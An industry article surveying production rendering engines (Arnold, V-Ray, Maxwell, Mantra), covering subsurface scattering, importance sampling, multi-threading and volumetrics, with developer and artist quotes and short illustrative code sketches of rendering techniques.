    Disney Research recently presented a new paper on SSS, called Photon Beam Diffusion: A Hybrid Monte Carlo Method for Subsurface Scattering. It advances the art and improves on the Quantized Diffusion (QD) method that Weta, for example, had used on the Engineer characters in Prometheus. The QD method was an approximation: a sum-of-Gaussians approach to the BSSRDF. The new Disney method is even more advanced in that it moves from a point approach to a beam approach, allowing for a set of samples along these sub-surface beams. The result is even greater realism, continuing this trend of rapidly advancing SSS approaches, each built to work in a production environment (Photon Beam Diffusion should match QD for performance) rather than as a full brute force solution, which would cripple any real world production.

    Rendered using Arnold’s new SSS, from the remarkable Digic Pictures trailer for Watch Dogs.

    Arnold can now do brute-force ray traced sub-surface scattering without point clouds. This is a major improvement because of the memory/speed savings, improved interactivity and easier workflow compared to earlier point cloud methods. The problem with point methods, according to Fajardo, is that “it can be a bottleneck like any cache method.”

    The way Fajardo explains it, SSS research at the moment falls into one of two camps. You can “change the diffusion profiles, and make them slightly better looking and that is what the Disney guys have done and that is what the Weta guys did with QD. It does not change the workflow it makes the images look a bit better. You get more sharpness in the pores of the skin – it is hard to see – but when you see it, it is good. That is one thing, one axis but there is another axis. It is to make the whole process more efficient and that is what we have done, and we are really proud of this new system and it changes the way you think about SSS – it just makes it a lot easier.”


    src="http://player.vimeo.com/video/63659306?title=0&byline=0&portrait=0&color=f24f46" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    The remarkable MILK | TVC from NOZON 3D/Vfx where every pixel has SSS.


    The Milk spot above uses the new SSS in Arnold, which is no longer point cloud based. Gael Honorez, lead renderer at Nozon, explained that this would be very difficult to do with point-based methods, as you would need a very dense point cloud which would use a lot of memory and take a long time to precompute. The memory issue is really key; in fact the memory constraints would have made this project impossible to complete – without a major rethink – if it were not for the new approach.

    “The way people still do sub-surface,” says Fajardo, “is still by doing point clouds which is a really inefficient workflow approach. The work that Solid Angle has been doing (and is presenting at SIGGRAPH 2013) is for us a game changer. We co-developed that with Sony Pictures Imageworks, the results are really good in terms of performance compared to point clouds.” Solid Angle does not pre-process and store information in a point cloud; they just fire more rays in an intelligent way. This makes it much better for scaling, works much better with multi-threading and has lower memory requirements. Users do not need to worry about the density of point clouds or tweaking parameters. “You just press a button, you don’t have to worry about precomputing or adjusting values. This ends up being very much more efficient especially when you have many more characters in a scene – such as with crowds,” adds Fajardo.

    Assassin’s Creed: Black Flag trailer image rendered with SSS by Digic Pictures.

    Szabolcs Horvátth is lead TD at Digic Pictures and a driving force behind that studio’s transition to physically-based rendering with Arnold and the new SSS. He is incredibly excited about the creative windows this opens and the scalability, especially the notion of being able to render entire Massive crowds with ray traced SSS.

    Fxguide readers may recall that some time ago SPI flagged that they had moved to fully ray traced SSS on the last Spider-Man film.

    “Sony solved this problem (of good SSS) by jumping entirely to a full Monte Carlo path tracing technique. This is a remarkable commitment to image quality as almost the entire industry has stopped short of a full Monte Carlo solution for large scale production….SPI used an Arnold renderer for Spider-Man”.

    But this was different from the new implementation. The Spider-Man technique was single scattering; Fajardo explains the difference. “When you are doing SSS you can work at two levels. You can just use SSS to simulate what we call the first bounce – under the surface – that is single scattering. It is an easier and well defined problem. That is what they did on Spider-Man. We along with Sony helped develop single bounce scattering more efficiently with GI. Now we are talking about multiple scattering, this is what gives you the softness and bleeding of light. That is a lot more difficult, and that is only possible now that people are starting to do this with ray tracing. Up to now you really needed to use point clouds and it was painful. This year at SIGGRAPH we are presenting a way to totally do away with point clouds. I am so happy that we are putting the final nail in the coffin of point clouds. I can’t even tell you! For many years that has been the last place you needed point clouds. A few people have been trying to do multiple scattering with ray tracing and we touch on this in our talk, but it was not very efficient, we use a new importance sampling technique for sub surface scattering, what we call BSSRDF Importance Sampling.”

    While this is a SIGGRAPH paper, the technique is also being used today in production at key Solid Angle customers such as Digic Pictures, and at effects houses such as Solid Angle’s original partner Sony Pictures Imageworks.

    Sony Pictures Imageworks breakdown reel from Oz – showing volumetric rendering done with Arnold.

    2.2.2 MIS

    Arnold was one of the first renderers to deploy MIS, back when Fajardo worked at Sony Pictures. Today the implementation at Solid Angle is quite advanced, going well beyond using it for BRDFs and lights. It is “applied to many many places in the renderer, virtually any place in the renderer where there is an integral you can apply IS – and there are many integrals in a renderer,” says Fajardo. “Most of the time people find just one sampler or method, but if you are smart enough you can find multiple samplers for the same task and then combine them.” It is, for example, used for SSS in Arnold.
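
    In its simplest textbook form (Veach’s balance heuristic; a generic sketch, not Arnold’s implementation), MIS weights each strategy’s sample by that strategy’s share of the combined probability density:

    // Balance heuristic: weight for a sample drawn from strategy A when a
    // second strategy B could also have produced the same sample.
    double misWeight(double pdfA, double pdfB) {
        return pdfA / (pdfA + pdfB);
    }

    // One-sample-per-strategy direct lighting estimator (schematic):
    //   L = (f * Li * cos / pdfLight) * w(pdfLight, pdfBsdf)   <- light sampling
    //     + (f * Li * cos / pdfBsdf)  * w(pdfBsdf, pdfLight)   <- BSDF sampling
    // Each term alone is unbiased; MIS keeps whichever strategy poorly matches
    // the integrand (tiny lights vs. sharp BSDF lobes) from dominating the noise.
    double combineDirectLighting(double lightContrib, double pdfLightAtLightSample, double pdfBsdfAtLightSample,
                                 double bsdfContrib,  double pdfBsdfAtBsdfSample,   double pdfLightAtBsdfSample) {
        return lightContrib * misWeight(pdfLightAtLightSample, pdfBsdfAtLightSample)
             + bsdfContrib  * misWeight(pdfBsdfAtBsdfSample,   pdfLightAtBsdfSample);
    }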

    “The control is hidden from the user,” says Fajardo. “The user should never know, they don’t need to know. The user should never never know as it is unrelated to the art of using a renderer.”

    While the user may never need to know directly, MIS is incredibly important to image quality and render speed. IS is being used in the new SSS example above and also with area lights. Area lights are not only great tools for producing very attractive lighting, as any DOP knows, they are also key to using IBL with HDR lights in the scene and many other areas of modern production. Another great example of Arnold’s research into IS was published at the Eurographics Symposium on Rendering last month (2013). The paper, called An Area-Preserving Parametrization for Spherical Rectangles, explains how much more sensibly lights can be sampled given the spherical projection nature of working in computer graphics.

    In the diagram below (left) it can be seen that a rectangular light can appear bowed – in much the same way a real light such as a Kino Flo appears bowed when shot with an 8mm fisheye lens (right). Note that this apparent shape, as seen from the point being computed, is called the solid angle (from which the company takes its name).

    This shows the bent mapping – that actually happens as the light turns – relative to its solid angle.

    A frame from an HDR – note the bowed Kino Flo light – or real world area light.


    The company Solid Angle takes the mathematical solid angle into account with its sampling.

    If you look at the ‘random’ samples below on the left, you see a seemingly sensible distribution across a square patch which represents an area light. The problem is that when the area light is seen from the computer’s point of view via the ‘solid angle’ maths – that is, the area light as ‘projected’ along the sight line onto the computational ‘dome’ used in computer graphics – it is easy to see just how much the samples collect along the edges. This bias is much stronger than one might imagine – it is worth checking any square for yourself (count in from the left and bottom and you can see that both of the shapes in (a), marked Area sampling, are exactly the same). What is needed is to start from a different distribution. If one starts with the scattering on the left in (b), Spherical Rectangle sampling, then when the ‘projection’ is taken into account the samples are now more evenly spread. This directed sampling is just a refinement that falls under improved Importance Sampling.
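
    The underlying issue is a change of measure: a pdf that is uniform over the light’s area is not uniform over the solid angle the light subtends at the shading point. A generic sketch of the standard conversion (this is not the paper’s spherical-rectangle algorithm, just the textbook relationship it improves upon):

    #include <cmath>

    // Convert a pdf expressed per unit area on the light into a pdf per unit
    // solid angle as seen from the shading point.  Because the factor
    // distance^2 / |cos| varies across the light, uniform-area samples end up
    // unevenly distributed once viewed in solid angle.
    double pdfAreaToSolidAngle(double pdfArea,        // e.g. 1 / lightArea for uniform area sampling
                               double distance,       // shading point -> light sample
                               double cosLightNormal) // cosine between light normal and that direction
    {
        return pdfArea * distance * distance / std::fabs(cosLightNormal);
    }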


    How much difference does this one clever IS improved PDF (probability distribution function) make?

    It is most noticeable closer to the lights. Exclusively, we can show an animation rendered with the normal area sampling and then – with no other change than the new IS – the spherical sampling version. The reduction in noise is dramatic. (note some banding in these videos is from compression NOT rendering)

    Area vs spherical sampling.

    2.2.3 Multi-Threading Performance

    It can be argued that with ray tracing there are three primary concerns:

    1. render speed
    2. noise
    3. memory limitations

    But Fajardo says he would add a fourth: threading scalability. Today machines can have 32 threads and this is only going to increase. Scalability “is going to be more and more important as Intel and others come out with processors with more and more threads on them,” says Fajardo.

    Arnold has incredible multi-threading performance. “I feel like we have done a tremendous amount of work to make Arnold scale optimally in many-core machines. It’s easy to run fast on one thread, but running on 64 threads is a different story, you typically run into all kinds of performance bottlenecks that you have to analyze individually and solve with careful, low level programming or sometimes with better mathematical models.”

    Fajardo argues that things one might take for granted, like texture mapping, can become threading bottlenecks unless the renderer and development teams can benchmark, analyze and optimize on a machine with many cores. At the time we spoke to Fajardo, Solid Angle were evaluating machines graciously donated by Intel with 32 physical cores / 64 threads.

    This SPI breakdown video shows one of the first films to use Arnold to deal with complex volumetrics in MIB3.

    In the case of texture mapping, the problem is that you need a texture cache to hold the hundreds of GB of texture data required to render a complex VFX shot. “And texture caches require some sort of locking mechanism so that multiple threads can write and read from the cache in parallel without corruption,” says Fajardo. “We worked hard with ILM during PacRim (Pacific Rim) to solve that problem and as a result we probably have the most efficient (in terms of threading) texture engine in the industry. It’s funny to watch other renderers die at such scenes, renderers that have traditionally had awful threading scalability (like Pixar’s PRman), where people have gotten used to such bad scaling that to compensate run such renderers on a small number of threads per job, e.g. run four 2-threaded jobs on a machine with 8 threads, therefore limiting the amount of memory available to each job.”
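
    The locking problem Fajardo describes is generic. As a rough illustration (not Arnold’s, ILM’s or any texture library’s actual code), a tile cache can avoid one global mutex by sharding on the tile key, so lookups for different tiles rarely contend:

    #include <array>
    #include <cstdint>
    #include <mutex>
    #include <unordered_map>
    #include <vector>

    struct Tile { std::vector<std::uint8_t> texels; };

    // A single global lock serializes every texture lookup and kills scaling on
    // 32+ threads.  Sharding the cache by hash lets lookups for different tiles
    // proceed in parallel; contention only happens within one shard.
    class ShardedTileCache {
    public:
        const Tile& fetch(std::uint64_t tileId) {
            Shard& shard = shards_[tileId % kShards];
            std::lock_guard<std::mutex> lock(shard.mutex);
            auto it = shard.tiles.find(tileId);
            if (it == shard.tiles.end())
                it = shard.tiles.emplace(tileId, loadTileFromDisk(tileId)).first;
            return it->second;   // unordered_map references stay valid after inserts
        }

    private:
        static Tile loadTileFromDisk(std::uint64_t /*tileId*/) { return Tile{}; }  // stub

        static constexpr int kShards = 64;
        struct Shard {
            std::mutex mutex;
            std::unordered_map<std::uint64_t, Tile> tiles;
        };
        std::array<Shard, kShards> shards_;
    };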

    With Arnold, one can be sure “you are making full use of all of those 16, 24 or even 32 cores in your machine while using all of the available memory,” argues Fajardo. This becomes increasingly important, of course, as artists do lighting work on increasingly complex scenes on powerful workstations with an ever increasing number of CPU cores.

    “You would be surprised,” explained Fajardo. “Even Disney’s almighty Ptex library, which caused so many ripples in the industry, is not threaded well and destroys the performance of your renders. Which is probably OK for Disney as they use PRMan and therefore run it on very few threads. But run it on all the threads of a powerful machine, as we did, on a simple scene with a single Ptex-textured polygon, and the results are abysmal.” Here are the results Solid Angle provided to support this claim:

    threads    pixel rendering time    speedup
    1          18.94s                  1x
    2          11.91s                  1.6x
    4          7.23s                   2.6x
    8          9.44s                   2.0x
    16         12.37s                  1.5x
    32         13.39s                  1.4x
    64         14.65s                  1.3x

    In this test case, instead of being 32x faster with 32 threads, it’s only 1.4x faster (and just 1.3x with all 64 threads). “Which means that 30 of the cores are idle and you are wasting your money,” he adds. “I could give you more examples. Katana has never been thread-safe and therefore forced single-threaded loading of geometry (though I imagine they will fix this eventually). Most hair-generation pipelines are ancient and therefore not ready for multi-threading. All of which are reasons why big studios don’t fully take advantage of threading and would run multiple single-threaded jobs on the same machine. It’s an embarrassing fact that most studios hide, and if you ask them they’ll give you all kinds of hand wavy explanations as to why running single-threaded jobs is more ‘efficient’,” Fajardo points out passionately.

    Many companies talk about multi-threading but this is often not addressing the overall production problem for Solid Angle, as they believe “it’s easy to multi-thread well when you don’t have hundreds of GB of texture data, or complex SSS, displacement, etc – all used together in the same shot,” says Fajardo. “Just like it took years for people to catch up with global illumination and ray tracing, it’s still taking people years to catch up with efficient multi-threaded programming. Unless the company is hell-bent on systems performance on modern machines, like Solid Angle is, multi-threading scalability is the Achilles heel of production renderers.”

    Pacific Rim. This image rendered in Arnold by ILM. Courtesy Warner Bros. Pictures.

    2.2.4 Volumetric rendering and volumetric lighting

    Arnold has a code base also inside Sony Pictures due to the historical development of the product (see our original rendering article). We asked Rob Bredow, Imageworks CTO, about the innovations happening inside Sony with their version of Arnold. “I think the biggest new innovations are full volumetric rendering in-camera with global illumination,” he says. “It’s enabled new looks like you’ve seen on Oz and will see in some of our future work as well. It’s really changed the way we can work.”

    The cloud work in Oz and the rocket Apollo launch in Men in Black 3 are both excellent examples of the impressive new volumetric innovations. These innovations, as has happened historically with all such advances, have been shared between SPI and Solid Angle.

    From the EGSR 2012 paper – joint research by SPI and Solid Angle.

    This work builds on the research that Christopher Kulla at SPI has been doing and publishing in conjunction with Solid Angle, and with Fajardo in particular – “the sampling work we have done for volumetric lighting over the past couple of years, and which we showed at SIGGRAPH 2011 and EGSR 2012,” commented Fajardo.

    Importance Sampling Techniques for Path Tracing in Participating Media. Rendered ~ 5 mins a frame on a 2 core laptop.

    The volumetric lights have proven very popular with clients. “One of the nicest compliments we get is that our volumetric lights are quite beautiful and very easy to use,” says Fajardo. There are two aspects to volumetric lighting: homogeneous or uniform lighting (a spot light in an even fog with a beautiful cone of light), and non-uniform, heterogeneous lighting – which is of course much more difficult.

    As mentioned above, OpenVDB is important for storing non-uniform media. In addition to supporting OpenVDB, Solid Angle is also working with FumeFX, Luma Pictures and Digic Pictures to implement their volumetric effects in Arnold.


    2.3 V-Ray – Chaos Group

    V-Ray from Chaos Group is one of the most successful third party renderers, with wide adoption. Key V-Ray studio users include Digital Domain (Oblivion, Ender’s Game) and Pixomondo (Star Trek: Into Darkness, Oblivion). ILM also used V-Ray heavily for environments on G.I. Joe: Retaliation, Star Trek: Into Darkness, The Lone Ranger and Pacific Rim. And Scanline VFX is another V-Ray heavy lifter. “In fact I think everything ever rendered on their (Scanline’s) showreel is out of V-Ray and they have done tight integration with their Flowline fluid simulations,” says Lon Grohs, business development manager of Chaos Group. “This includes work on Avengers, Battleship, Iron Man 3, all kinds of stuff.”

    Stuart White, head of 3D at Fin Design, a boutique high end commercials animation, design and effects company in Sydney, uses V-Ray and finds it a perfect fit, providing high end ray traced accurate results without the pipeline and artist overhead of non-raytraced solutions. “Rendering-wise, we are all about V-Ray here. It makes consistently beautiful images whilst being easy to use, affordable and pretty bullet proof even in the face of some seriously heavy scenes.”


    Fin Design + Effects, Sydney, use V-Ray for high end TV spots like this Cadbury one.

    As seen above, V-Ray produces excellent images with particularly good fur and SSS, and is used around the world by large facilities but especially mid-sized companies producing high end work. It is also now available on several popular cloud services, and was used that way by Atomic Fiction for Flight.

    There are various versions of V-Ray supporting different products, such as Max, Maya, Rhino, SketchUp and more, but for the purposes of this article we can assume they are the same from a rendering point of view.

    V-Ray is basically a ray tracer and it does do brute force ray tracing very well, but the team at Chaos Group have added all types of optimizations for architectural visualization and other areas, so the product does have radiance caches and a bunch of other things which would be classed as biased, but it can work very much as an unbiased renderer. It has had physically based materials and lights from the start of the product – “that is what we are from the start,” says V-Ray creator and Chaos Group co-founder Vlado Koylazov.

    V-Ray’s workflow is very clean and the artist can work well with data from on set such as HDR image probes and IBL lighting etc. “We hear people like being 90% there and just matched to a plate with just the things they have documented from on set. From there – there is always the artistry. In fact I have only had one client ever come and ask for non-physically based rendering,” jokes Lon Grohs.


    A scene from Oblivion. VFX by Pixomondo.

    The product has used MIS since the start. V-Ray is very much a modern renderer: sampling is often handled for the artist, keeping the interface very clean, using adaptive sampling. The adaptive sampling increases sample counts based on a noise threshold system – the renderer checks neighboring pixels and applies more samples until the noise threshold is reached.
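
    To make the idea concrete, below is a minimal, hypothetical Python sketch of noise-threshold adaptive sampling – not Chaos Group’s code, and simplified to a per-pixel variance test rather than the neighboring-pixel comparison described above. The shade() function is just a stand-in for tracing one camera ray.

    ```python
    import random, statistics

    def shade(x, y):
        """Stand-in for tracing one camera ray; returns a noisy luminance sample."""
        base = 0.5 + 0.4 * ((x + y) % 2)           # fake checkerboard 'scene'
        return max(0.0, random.gauss(base, 0.2))   # Monte Carlo noise

    def render_adaptive(width, height, noise_threshold=0.01, min_spp=8, max_spp=256):
        image = [[0.0] * width for _ in range(height)]
        for y in range(height):
            for x in range(width):
                samples = [shade(x, y) for _ in range(min_spp)]
                # Keep adding samples until the standard error of the pixel mean
                # drops below the noise threshold, or we hit the sample cap.
                while len(samples) < max_spp:
                    stderr = statistics.stdev(samples) / len(samples) ** 0.5
                    if stderr < noise_threshold:
                        break
                    samples.extend(shade(x, y) for _ in range(min_spp))
                image[y][x] = sum(samples) / len(samples)
        return image

    img = render_adaptive(8, 8)   # smooth pixels stop early, noisy ones keep sampling
    ```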

    In the early days of the product the company had to deal with efficient memory use to allow for the scenes to be rendered in what was then very small amounts of RAM. The team deployed a proxy system which was very successful and is still used today. It avoids having to load all the geometry at once.

    V-Ray’s SSS:


    SSS in V-Ray. Dan Roarty (2011).

    V-Ray uses a dipole approximation for the VRayFastSSS2 shader. “Some methods are more precise technically speaking, but we’ve found that the VRayFastSSS2 provides the best balance between quality, speed, and intuitive controls,” says Koylazov. “For V-Ray 3.0, we are considering additional models including a fully ray traced solution. We are also looking to implement a simple skin shader with simple, artist-friendly settings. Some of our customers have written their own SSS shaders for V-Ray including multipole and quantized diffusion.”
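
    For readers curious what a dipole approximation actually computes, here is a small Python sketch of the classic dipole diffuse reflectance profile from Jensen et al.’s ‘A Practical Model for Subsurface Light Transport’ – the general family of model that fast SSS shaders of this kind are broadly built on, not Chaos Group’s specific implementation. The scattering coefficients below are purely illustrative.

    ```python
    import math

    def dipole_Rd(r, sigma_a, sigma_s_prime, eta=1.3):
        """Diffuse reflectance R_d(r) of the classic dipole model, where r is
        the distance between the points where light enters and exits."""
        sigma_t_prime = sigma_a + sigma_s_prime          # reduced extinction
        alpha_prime   = sigma_s_prime / sigma_t_prime    # reduced albedo
        sigma_tr      = math.sqrt(3.0 * sigma_a * sigma_t_prime)
        # Boundary term derived from the relative index of refraction eta
        F_dr = -1.440 / eta**2 + 0.710 / eta + 0.668 + 0.0636 * eta
        A    = (1.0 + F_dr) / (1.0 - F_dr)
        z_r  = 1.0 / sigma_t_prime          # depth of the real source
        z_v  = z_r * (1.0 + 4.0 * A / 3.0)  # height of the mirrored virtual source
        d_r  = math.sqrt(r * r + z_r * z_r)
        d_v  = math.sqrt(r * r + z_v * z_v)
        return alpha_prime / (4.0 * math.pi) * (
            z_r * (sigma_tr * d_r + 1.0) * math.exp(-sigma_tr * d_r) / d_r**3 +
            z_v * (sigma_tr * d_v + 1.0) * math.exp(-sigma_tr * d_v) / d_v**3)

    print(dipole_Rd(0.1, sigma_a=0.03, sigma_s_prime=1.0))  # illustrative values
    ```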

    It is possible to render a full brute force solution inside V-Ray but it will naturally be slow. As V-Ray is a production renderer most people use the new and popular VRayFastSSS2, but before the new Fast SSS2, V-Ray was already producing strong SSS images as seen in the Blue Project image left.


     


    Dan Roarty (2013).


    When Dan Roarty is working he sets up a few area lights behind the head to see how much light passes through the ears. This helps him gauge how thick the SSS should be.

    The new ‘Nana’ was:

    • modeled in Maya
    • sculpted/textured in Mudbox
    • hair done in Shave and a Haircut
    • all the spec maps in the new software Knald
    • Rendered in V-Ray

    Adam Lewis at adamvfx.com outlined his view on V-Ray’s SSS:

    “The beauty of V-Ray’s SSS2 shader is you don’t really need any special techniques to get a great result, the shader behaves like you would expect from a scattering material in real life, so using the SSS2 shader well is mostly a matter of understanding how real world materials like skin behave.

    So with that said, there are a couple of specific techniques that some artists might not be aware of. One very useful technique is to use a separate bump map for the specular component. The advantage of this approach is you can introduce an extremely fine bump map that affects only the specular, which is very useful for controlling the microstructure of a surface.

    Another useful technique is to use a simple grayscale map to introduce some diffuse shading into the SSS2 shader to simulate dead/dry/flaky skin on top of the scattering surface. A great example of this quality can be seen in something like dry lips, where you have two very distinct materials interacting with each other: the soft, highly scattering skin of the lips as a whole, with the more diffuse, dry skin on top.”

    The next version of the software will be shown at SIGGRAPH 2013, showing 3.0 which is entering beta. V-Ray 3.0 is expected to ship in the Fall. V-Ray RT, the real time product, will be supporting new SSS, and the team have been working very closely with Nvidia on their CUDA optimizations. Hair rendering should be 10 to 15 times faster in version 3. There will also be a new simplified skin shader in version 3.0 for doing digital double work, one they hope will be a little more user friendly. Also in version 3 will be the open source support mentioned above, with Alembic and OpenEXR 2 support. Viz maps are being introduced – these are material definitions, V-Ray maps, which can be common across multiple applications like Max and Maya. And, as mentioned above, version 3.0 will support OSL.

    The team are also introducing a new “progressive production rendering” – a one-click path traced render which will continue to refine and eventually converge to a production final render.


    G.I. Joe: Retaliation (2013) rendered in V-Ray by ILM.

    Last SIGGRAPH the company announced V-Ray for Katana and V-Ray for Nuke. Both are now at the testing stage. The projects would best be described as ‘by invitation’. If you are interested in V-Ray for Foundry products email Chaos Group directly or find them at SIGGRAPH. Both products are real but are unlikely to be shown publicly at their SIGGRAPH booth.


    2.4 Maxwell – Next Limit

    Maxwell Render is a standalone unbiased renderer designed to replicate light transport using physically accurate models. Maxwell Render 1.0 was first released by Next Limit in 2006, and from the outset it adopted this ‘physically correct’ approach.

    “The main aim of Maxwell is to make the most beautiful images ever,” says Juan Cañada, the Head of Maxwell Render Technology. “That’s the main idea we had in mind when we started the project. Apart from that we wanted to create a very easy to use tool and make it very compatible, so everybody can use it no matter what platform you wanted to use.”


    Image from MTV EMA ident rendered in Maxwell Render by Sehsuct Berlin.

    Maxwell Render is unbiased – this means that the render process will always converge to a physically correct result, without the use of tricks. This is very important both in terms of quality but also ease of use. Maxwell really does mirror the way light works without tricks and hacks.

    So successful has Maxwell Render been in replicating real world environments that it has become the yardstick by which most other solutions are judged ‘correct’ or not. It is no accident the renderer is referred to as a ‘light simulator’.

    The software can fully capture all light interactions between the elements in a scene, and all lighting calculations are performed using spectral information and high dynamic range data. A good example of this is the sharp caustics which can be rendered using Maxwell’s bi-directional ray tracer, with some Metropolis Light Transport (MLT) approach as well.


    Grass rendering in Maxwell. Image by Hervé Steff, Meindbender.

    The algorithms of Maxwell use advanced bi-directional path tracing with a special hybrid Metropolis implementation that is unique in the industry. Interestingly, in the last few years the whole industry has been moving more towards Maxwell’s physically based lighting and shading approach, while the Next Limit engineers have been making Maxwell Render faster and better using key technologies such as MIS and multi-core threading to optimize the speed in real world production environments.

    Maxwell started out ‘correctly’ according to Cañada, so it has recently been mainly about making Maxwell faster and easier to use, since they have no bias or point cloud approach legacy. The team is focused on issues such as multi-threading and other practical matters. “I agree at the beginning Maxwell was almost an experiment – ‘let’s try and do the most accurate renderer in the world’ – once we were happy with the quality we said – ‘OK, let’s make an interactive renderer – optimize everything’. We have been very focused on multi-threading so when you had just one or two cores Maxwell might have been slow but now people have 8 or 12 cores. It can even be faster than other solutions in certain situations,” says Cañada. It is common now to use Maxwell for animation, something that was fairly unrealistic just four or five years ago.


    src="http://www.youtube.com/embed/Hr2Bc5qMhE4?rel=0" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Above: Deadmau5 ‘Professional Griefers’ music video features characters rendered in Maxwell Render by Method Studios.


    Normal path tracing is slowed or confounded by optical phenomena such as bright caustics, chromatic aberration, fluorescence or iridescence. MLT works very well on some of these shots, while being very complex to implement, and Cañada will be giving an advanced talk on lighting and rendering techniques at SIGGRAPH 2013 which will cover some of the complexity of attempting a successful MLT implementation and why few people have tried it.


    Want to know more about Maxwell Render? See fxguide’s new iBook – From Sim to Render: The Next Limit Story available for free to download.

    The Next Limit implementation is not a full MLT but a clever hybrid solution. MLT can be very fast on complex shots and yet more expensive to render on others. For example, its approach of nodally mapping paths bi-directionally helps it focus in on the problem of, say, light coming through a keyhole in a door to a darkened room, or producing very accurate caustics. But a full MLT can be slower than other algorithms when rendering simple scenes. “The power of Metropolis is in exploring difficult occurrences and its strongest point is sometimes its weakest point when dealing with simple scenes,” explains Cañada.
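
    A toy sketch of the Metropolis idea makes that trade-off easier to see: path mutations are accepted with probability min(1, f(new)/f(old)), so once the sampler stumbles onto a rare bright path (the keyhole) it keeps exploring near it, while on a simple, evenly lit scene that machinery buys you little. This is a generic, hypothetical illustration – not Next Limit’s hybrid – and it omits the re-weighting a real MLT renderer needs to remain unbiased.

    ```python
    import random

    def f(x):
        """Stand-in for path 'brightness': one narrow bright feature (the keyhole)
        over a dim background on the unit interval."""
        return 100.0 if 0.70 < x < 0.71 else 0.1

    def metropolis(n_samples, mutation_size=0.05):
        x = random.random()
        fx = f(x)
        visited = []
        for _ in range(n_samples):
            y = min(1.0, max(0.0, x + random.uniform(-mutation_size, mutation_size)))
            fy = f(y)
            # Accept the mutated path with probability min(1, f(y)/f(x)).
            if random.random() < min(1.0, fy / fx):
                x, fx = y, fy
            visited.append(x)
        return visited

    v = metropolis(100000)
    # The sampler ends up concentrating on the 1%-wide bright region.
    print(sum(1 for s in v if 0.70 < s < 0.71) / len(v))
    ```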

    Sometimes with an MLT you cannot use all the same sampling techniques you can use with a path tracing system, at least not everywhere in the code. Cañada points out that “you can not use quasi-Monte Carlo for example in many places – you can of course use some things in some places,” but the Maxwell system is very different; for example Next Limit’s implementation of Maxwell’s MLT, at its core, does not use MIS. There is MIS in Maxwell (extensively) but not in the MLT part of the code.

    While pure MLT does not seem to be favored by any part of the industry, Next Limit believes there is a lot to be learnt from MLT and they are constantly exploring how to improve bi-directional path tracing.


    Rendering food can be extremely hard. Image by Hervé Steff rendered in Maxwell

    Maxwell Render includes Maxwell FIRE, a fast preview renderer which calculates an image progressively, and so renders can be stopped and resumed at any time. If the renderer is left long enough it will simply converge to the correct full final solution. It is very good for preview, but normally once an artist is happy with the look, they switch to the production renderer for the final. This approach means that users can get faster feedback but also know the results won’t change in the final render.
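
    The mechanics behind that kind of progressive preview are easy to sketch: keep a running sum of samples per pixel and divide by the pass count whenever the image is displayed. The Python below is a generic, hypothetical illustration of that accumulation scheme – not Maxwell FIRE itself – with sample_pixel() standing in for tracing a real light path.

    ```python
    import random

    def sample_pixel(x, y):
        """Stand-in for tracing one light path through a pixel."""
        return random.random()   # noisy estimate of the pixel value

    class ProgressiveBuffer:
        """Running-mean accumulation: the image can be stopped, shown and
        resumed at any time, and only ever gets less noisy."""
        def __init__(self, width, height):
            self.w, self.h = width, height
            self.sums = [[0.0] * width for _ in range(height)]
            self.passes = 0

        def add_pass(self):
            for y in range(self.h):
                for x in range(self.w):
                    self.sums[y][x] += sample_pixel(x, y)
            self.passes += 1

        def image(self):
            return [[s / self.passes for s in row] for row in self.sums]

    buf = ProgressiveBuffer(4, 4)
    for _ in range(16):        # each iteration refines the same image
        buf.add_pass()
    preview = buf.image()
    ```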

    “People were used to traditional workflows with old school renderers where they want to render a lot of passes,” adds Cañada. “You just think of Maxwell as a real camera – so you just focus on lighting, focus on materials. You work like a traditional photo developer and you don’t worry too much about the technical details of transport algorithms.”


    Scandinavian by Alfonso Perez. Rendered in Maxwell.

    One of the most challenging things for an unbiased renderer is SSS. As stated above, most approaches are point based, and Cañada explains that “it is one of the biggest challenges for Maxwell in terms of trying to make something accurate and at the same time fast enough to be used in real life production.” “In Maxwell we will not apply biased techniques, as it is important that Maxwell not only be used in effects to create good images but also in a scientific way, producing predictable results to help you with and guide you in making real world design decisions.” They have developed their own system, which is fast enough for most applications, but it is perhaps the main area of current research and development at Next Limit for Maxwell, and Cañada hopes to make “a large contribution soon, perhaps next year.”

    Combined with the multi-light feature, advanced ray tracing, massive scene handling, procedural geometry for fur, hair and particles, and a Python SDK for custom tools, Maxwell is a production tool today. In the past the ‘purist’ Maxwell approach could prove too slow for production, but with a combination of Moore’s Law and Next Limit’s engineering efforts, the renderer is becoming increasingly fast and more popular.


    ‘The Gateway’ by Rudolf Herczog. Rendered in Maxwell.

    The next release of the product will support new volumetrics, Alembic and deep compositing, and will see Maxwell integrated much more closely with Next Limit’s RealFlow, with direct Maxwell previewing built into RealFlow. “There will be between 25 and 30 new features from volumetrics to deep compositing, it is a major release, the biggest release in our history,” explains Cañada.

    RealFlow has been hugely successful in fluid simulation, so providing good rendering visualisation of simulations is a great bonus; after all, most sim artists are not necessarily lighters – so easy and high quality renders will just provide the sims team with more information on what the sims will look like. “It will be a milestone for us – now when you open RealFlow you will just have a Maxwell window inside and when you simulate with RealFlow you can preview with Maxwell inside the application,” says Cañada.


    2.5 Mantra – Side Effects Software

    Side Effects Software’s Houdini product is incredibly successful. In countless films now it seems a Houdini component exists helping with either fluid effects, destruction sequences, smoke, flames or just procedural implementations of complex animation.

    Andrew Lowell, Senior FX Artist and Houdini trainer at fxphd.com, has used Houdini on films like Jack the Giant Slayer, Ender’s Game, Transformers 3, Thor, Sucker Punch, Invictus, Mummy 3 and Aliens in Attic. “Like most things in the Houdini universe, Mantra will deliver everything you ask of it and more as long as the user commits to learning the science of what they’re doing,” says Lowell. “It doesn’t hold anything back or make anything easier. Like many people the first time I fired up a Mantra render I was thoroughly disappointed by the lack of prettiness, a clunky speed, and having to go to a few different places in the software to get in and start adjusting things. But, when it came time to get the job done, Mantra has never let me down. It’s enough to make any lighting department struggling with heavy renders, envious. What at first seems like a slow render on a sphere manifests itself in production as a highly efficient render of millions of particles with full motion blur. What seems like a lot of work to set up a shader ends up being that life-saving modification at a low level to easily give the compositor the AOV’s they need. And what seems like a lack of user interface with ease concerning lighting and submission turn into highly automated and dependent systems in the latter stages of production.”


